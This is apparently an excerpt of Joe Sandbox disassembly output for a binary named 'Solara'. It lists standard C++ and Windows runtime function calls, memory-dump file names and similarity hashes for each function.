                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209C97
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CA8
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CBC
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CDD
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209CEE
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00209D06
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cpp_errorThrow_std::_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2134207285-0
                                                                                                                                      • Opcode ID: 44d4f58e2cd27037f9ded942be57fa3834a00201aba75a7f43d3aaae74453a63
                                                                                                                                      • Instruction ID: 6c09b857233c83cbfe0d8fd91e125b4bce893853a3c955604012bf52456b0e8e
                                                                                                                                      • Opcode Fuzzy Hash: 44d4f58e2cd27037f9ded942be57fa3834a00201aba75a7f43d3aaae74453a63
                                                                                                                                      • Instruction Fuzzy Hash: 5B41C2B1D10745CBEB309F6089457AFB7F4AF49324F18062EE56B162D3D37169A0CB52
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,0021ACDE,00210760,0020B77F,75E5C5C8,?,?,?,?,0022BFCA,000000FF), ref: 0021ACF5
                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0021AD03
                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0021AD1C
                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0021ACDE,00210760,0020B77F,75E5C5C8,?,?,?,?,0022BFCA,000000FF), ref: 0021AD6E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                      • Opcode ID: 058aafdbfad83f52e8ac6830d7d70f522a14ec3647e5f00a76fed8458358112c
                                                                                                                                      • Instruction ID: 6f9a10b96b75e99205b4bb38858fed242ffb7e8d8b82cf90685647df49911446
                                                                                                                                      • Opcode Fuzzy Hash: 058aafdbfad83f52e8ac6830d7d70f522a14ec3647e5f00a76fed8458358112c
                                                                                                                                      • Instruction Fuzzy Hash: A901DD32237A176DE7251EB87C4E9A626C4E711B75720032BF610559F0EF518CA65981
                                                                                                                                      APIs
                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0021B68D
                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0021B906
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                      • API String ID: 2673424686-393685449
                                                                                                                                      • Opcode ID: baf653ac6bfd639bb7b615c887e95608f98e912654996fdb24e9e73ee00de4d2
                                                                                                                                      • Instruction ID: 91b7205d6d4ba6f12f2544846b736faf77cc5e549de92869023f1033278a1f91
                                                                                                                                      • Opcode Fuzzy Hash: baf653ac6bfd639bb7b615c887e95608f98e912654996fdb24e9e73ee00de4d2
                                                                                                                                      • Instruction Fuzzy Hash: 71B1697182020AEFCF16DFA4C8819EEB7F9AF64310F15455AE811AB212D731DAB1CF91
                                                                                                                                      APIs
                                                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0020BF44
                                                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0020C028
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                                                      • Opcode ID: 643972baeb3f084c9f8aea891450300414d26d2e44fc84dd805bc40695bdfa5d
                                                                                                                                      • Instruction ID: f073652bef62ecf06793c98262a9b8d722c88c4d01cdcd938c0b5189ba7f9f0a
                                                                                                                                      • Opcode Fuzzy Hash: 643972baeb3f084c9f8aea891450300414d26d2e44fc84dd805bc40695bdfa5d
                                                                                                                                      • Instruction Fuzzy Hash: 6B41CB70910306DFCF3ADF28C8499ADB7B5AF18300F58806DE449A7A93C734AA60CF51
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,75E5C5C8,?,?,00000000,0022BE94,000000FF,?,00215685,00000002,?,00215721,00218396), ref: 002155F9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0021560B
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,0022BE94,000000FF,?,00215685,00000002,?,00215721,00218396), ref: 0021562D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      • Opcode ID: eecc62935e6a061e89d485c53a05ba0ef9d187139d393a87ca8557f25b9a7c78
                                                                                                                                      • Instruction ID: bca9af060ec553f54d988b251719f070f6e3765a1ad699e54fd17e0787db9282
                                                                                                                                      • Opcode Fuzzy Hash: eecc62935e6a061e89d485c53a05ba0ef9d187139d393a87ca8557f25b9a7c78
                                                                                                                                      • Instruction Fuzzy Hash: B901D671A10A69FFCB118F80EC0DBEEB7FCFB45B15F004926F811A2290DB749950CA90
                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021D76F
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0021D838
                                                                                                                                      • __freea.LIBCMT ref: 0021D89F
                                                                                                                                        • Part of subcall function 0021BF11: RtlAllocateHeap.NTDLL(00000000,0021DF35,?,?,0021DF35,00000220,?,00000000,?), ref: 0021BF43
                                                                                                                                      • __freea.LIBCMT ref: 0021D8B2
                                                                                                                                      • __freea.LIBCMT ref: 0021D8BF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1423051803-0
                                                                                                                                      • Opcode ID: 9f61c0fa2ea2d87477de42d47cf52f4101b36eb9677b8d9aa9731eb09c270b3a
                                                                                                                                      • Instruction ID: c1e3ef8d69ebac00a9042a03474270fe4ed3aee1fa61d3d2c2f81492c3794b00
                                                                                                                                      • Opcode Fuzzy Hash: 9f61c0fa2ea2d87477de42d47cf52f4101b36eb9677b8d9aa9731eb09c270b3a
                                                                                                                                      • Instruction Fuzzy Hash: F2518372620206EFEB315F61DC81EFB76E9EF64710B160129FD04D6251E770DCB29AA0
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0020F005
                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00208E38), ref: 0020F024
                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00208E38,0020A2F0,?), ref: 0020F052
                                                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00208E38,0020A2F0,?), ref: 0020F0AD
                                                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00208E38,0020A2F0,?), ref: 0020F0C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 66001078-0
                                                                                                                                      • Opcode ID: 8ef4c298b2b527953ad9dcfdf5a3abd76ee9e34f257ed26a4b19ecbd511c38a6
                                                                                                                                      • Instruction ID: 9b45573cd7f250cf696eada606fbaa82da71b0856acbc0b51826c91dbe80b076
                                                                                                                                      • Opcode Fuzzy Hash: 8ef4c298b2b527953ad9dcfdf5a3abd76ee9e34f257ed26a4b19ecbd511c38a6
                                                                                                                                      • Instruction Fuzzy Hash: EF4158316A070ADBCB70CF64C68496AB3BAFF04310B10493AE446D7D87E770E9A5CB51
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0020D4C9
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0020D4D3
                                                                                                                                      • int.LIBCPMT ref: 0020D4EA
                                                                                                                                        • Part of subcall function 0020C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0020C1F6
                                                                                                                                        • Part of subcall function 0020C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0020C210
                                                                                                                                      • codecvt.LIBCPMT ref: 0020D50D
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0020D544
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3716348337-0
                                                                                                                                      • Opcode ID: 3af03408a02d9f1d05efdfda6de35e73724102a56b2a33c0ad9164f8f05249bd
                                                                                                                                      • Instruction ID: 8138ca5cc6a6b4df97914b4a5285effe1490a4150fcfaba84754b75c7e144869
                                                                                                                                      • Opcode Fuzzy Hash: 3af03408a02d9f1d05efdfda6de35e73724102a56b2a33c0ad9164f8f05249bd
                                                                                                                                      • Instruction Fuzzy Hash: CD01C4759203159FCB01EBA8D915AAE7BB5AF84328F640109E815AB2D3CF749E20CF81
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 0020ADDE
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0020ADE9
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0020AE57
                                                                                                                                        • Part of subcall function 0020ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0020ACC2
                                                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 0020AE04
                                                                                                                                      • _Yarn.LIBCPMT ref: 0020AE1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1088826258-0
                                                                                                                                      • Opcode ID: 620fa9040b9276567011bfa0be59fe310eeded834746d456510fca4fb7c6b391
                                                                                                                                      • Instruction ID: 5d9112af1b8ab3ec4d0027768f2bafe854ebe4d263dea1682f2eae7adb55a4ee
                                                                                                                                      • Opcode Fuzzy Hash: 620fa9040b9276567011bfa0be59fe310eeded834746d456510fca4fb7c6b391
                                                                                                                                      • Instruction Fuzzy Hash: FF017C75A203219BCB06EF20E95957D77B5FF88750B55401AE802673D2CF386E62CF82
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00215BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00220A35
                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00215BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00220A6C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$CodePageValid
                                                                                                                                      • String ID: ,K#$utf8
                                                                                                                                      • API String ID: 943130320-741511986
                                                                                                                                      • Opcode ID: 0aade5d4384f6ce4503c640072077643f18d119c76aa9185421d5cd31a61ad50
                                                                                                                                      • Instruction ID: 27e3a5af6819df70223d169ce9756e7dacf2433cf502ab56e3f0ede293eb8cec
                                                                                                                                      • Opcode Fuzzy Hash: 0aade5d4384f6ce4503c640072077643f18d119c76aa9185421d5cd31a61ad50
                                                                                                                                      • Instruction Fuzzy Hash: 51510931660326BAD734AFF1ACC1FAA73A8EF15708F140415F64597583E670EDA08BA5
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 00207526
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00207561
                                                                                                                                        • Part of subcall function 0020AF37: CreateThreadpoolWork.KERNEL32(0020B060,00208A2A,00000000), ref: 0020AF46
                                                                                                                                        • Part of subcall function 0020AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0020AF53
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                      • String ID: Fail to schedule the chore!$G.#
                                                                                                                                      • API String ID: 3683891980-2059570399
                                                                                                                                      • Opcode ID: bf9c8dbd9e65196359de20b87882dbf7158e78327067e2f0dcad0985ddc0ef25
                                                                                                                                      • Instruction ID: 493fcf0de77eaeab6c1758622b5943bb18d10563ff71158978a76ac0c896fd17
                                                                                                                                      • Opcode Fuzzy Hash: bf9c8dbd9e65196359de20b87882dbf7158e78327067e2f0dcad0985ddc0ef25
                                                                                                                                      • Instruction Fuzzy Hash: 93519CB1D103199FCB00DF94E849BAEBBB4FF08314F144129E8196B392D776A925CF91
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00203EC6
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00204002
                                                                                                                                        • Part of subcall function 0020ABC5: _Yarn.LIBCPMT ref: 0020ABE5
                                                                                                                                        • Part of subcall function 0020ABC5: _Yarn.LIBCPMT ref: 0020AC09
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                      • String ID: bad locale name$|= e.#
                                                                                                                                      • API String ID: 2070049627-665319736
                                                                                                                                      • Opcode ID: ec91632212b6d3818b4325b9047bf582589df7b4df23961cd43c7a653a1b4bed
                                                                                                                                      • Instruction ID: ae264520061c2b4a7a896aa5205b0e3b7210e73b1c667fa8627481c9a62acc35
                                                                                                                                      • Opcode Fuzzy Hash: ec91632212b6d3818b4325b9047bf582589df7b4df23961cd43c7a653a1b4bed
                                                                                                                                      • Instruction Fuzzy Hash: C241A1F0A107469BEB10DF69C819B57BBF8BF04714F044229E40997B81E37AE568CBE1
                                                                                                                                      APIs
                                                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0020B809
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                                                      • Opcode ID: 393ce3586057cb113479fc6e71392466c747ee493bbb858658075db6c8fee62a
                                                                                                                                      • Instruction ID: 1860e45d34eb0c3a1ef8ab83d7ca2ad9be6ee4e8b28ca59ea8234de0b26b5407
                                                                                                                                      • Opcode Fuzzy Hash: 393ce3586057cb113479fc6e71392466c747ee493bbb858658075db6c8fee62a
                                                                                                                                      • Instruction Fuzzy Hash: 5221F532920706DFDF369F54C855A79B3ACEF40720F14851EE411876E2DB38AEA1CE80
                                                                                                                                      APIs
